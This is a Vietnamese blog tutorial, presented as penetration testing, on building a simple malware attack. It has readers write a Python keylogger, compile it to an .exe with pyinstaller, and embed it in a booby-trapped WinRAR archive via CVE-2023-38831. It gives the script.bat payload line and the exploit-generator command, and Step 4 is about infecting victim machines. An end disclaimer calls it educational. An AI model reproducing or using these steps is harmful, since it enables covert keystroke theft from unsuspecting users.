Kiểm thử xâm nhập – Tạo malware đơn giản với CVE-2023-38831

Các loại mã độc ngày càng phát triển biến hóa rất nhanh cộng với việc kết hợp các công cụ và phương thức tấn công là một chiến lược mà các hacker và tội phạm mạng sử dụng để gia tăng hiệu suất và độ nguy hiểm của mình. Một ví dụ tiêu biểu về sự kết hợp này là việc sử dụng malware keylogger kết hợp với lỗ hổng bảo mật CVE-2023-38831 của phần mềm nén tệp WinRAR.

winrar-2.jpg

Trong bài viết này, chúng ta sẽ khám phá cách kết hợp này có thể tạo ra một trình độ tấn công mạng nguy hiểm và mối đe dọa nghiêm trọng đối với an ninh thông tin.

1694837602582.png

Bước 1​

Tạo một keyloger bằng python, sau khi chạy sẽ lắng nghe bàn phím của các bạn và ghi vào file keylogs.txt

Cài thư viện pynput bằng pip3 install pynput

Màn hình powershell thể hiện bạn chạy file python , sau đó bạn ra ngoài gõ bất kỳ , mình đã gõ cụm text bên trái các bạn

1694840940018.png

Các bạn có thể tham khảo đoạn của mình hoặc sử dụng của các bạn

Bước 2 sẽ convert sang file exe là file ngôn ngữ máy tính

các bạn có thể google các cách khác nhau, còn cách của mình bên dưới nhé :D

Cài thư viện pyinstaller tương tự như pynput pip3 install pyinstaller

READ  Xóa rác Window máy tính chỉ bằng 1 Click chuột !

Sau đó run command

#file a.py của mình chính là file chứa mã keylogger viết bằng python3

1694840601859.png

Lúc này việc thực thi file đã đơn giản hơn nhiều, các bạn chỉ cần kích chạy file exe đã build xong, lúc này ta có file keylogger chạy bằng exe

Bước 3 các bạn sẽ build file winrar có chứa CVE 2023-38831 

Các bạn có thể clone git này về để thực thi

Sau đó các bạn chỉnh sửa file script.bat, đây là nơi chứa đoạn mã gọi thực thi khi người dùng thực thi giải nén file trong winrar

a.exe &
CLASSIFIED_DOCUMENTS.pdf

a.exe là file keylogger đã build ở bước 2 , pdf là file pdf bất kỳ của bạn

python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
1694841577187.png

Bước 4 Lây nhiễm trên các máy nạn nhân

Cuối cùng tận hưởng thành quả , các bạn có thể thực thi trên windows vs các bản winrar < 22 để trải nghiệm
Các bạn nhớ bật thêm process explore để xem được tiến trình nhé

1694841852119.png

Trên đây là bài trải nghiệm cho các bạn học về malware và hiểu được các loại mã độc thực tế phát triển như thế nào , và bài viết chỉ mang tính học tập nghiên cứu.

Trả lời

error: Nội dung đã được bảo vệ !!
Contact Me on Zalo